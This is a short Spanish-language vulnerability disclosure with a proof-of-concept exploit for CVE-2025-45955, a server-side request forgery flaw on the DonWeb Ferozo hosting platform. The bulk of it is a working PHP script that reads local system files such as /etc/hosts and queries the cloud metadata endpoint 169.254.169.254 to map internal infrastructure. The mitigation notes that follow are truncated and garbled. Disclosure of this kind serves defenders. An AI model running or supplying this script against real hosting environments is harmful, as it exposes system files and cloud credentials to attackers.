
Exploit de prueba de concepto para CVE-2025-45955 que demuestra Server-Side Request Forgery (SSRF) en la plataforma de hosting DonWeb Ferozo, permitiendo el mapeo de infraestructura interna y la enumeración de metadatos en la nube.
Un atacante puede explotar esta vulnerabilidad subiendo y ejecutando un archivo PHP especialmente manipulado en la plataforma de hosting Ferozo. Cuando se accede a él, el archivo lanza una serie de intentos de SSRF dirigidos a servicios internos (como 127.0.0.1, 169.254.169.254 o endpoints de service mesh), archivos locales (p. ej., file:///etc/passwd) y endpoints conocidos de metadatos en la nube. El script recopila respuestas o mensajes de error, lo que permite al atacante mapear la infraestructura interna, enumerar servicios accesibles y recopilar información sensible para una explotación posterior.
El siguiente código demuestra la vulnerabilidad:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, etc.)127.0.0.0/8, 169.254.169.254, etc.) mediante reglas de firewall de salidaCVE-2025-45955
Reportado por [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]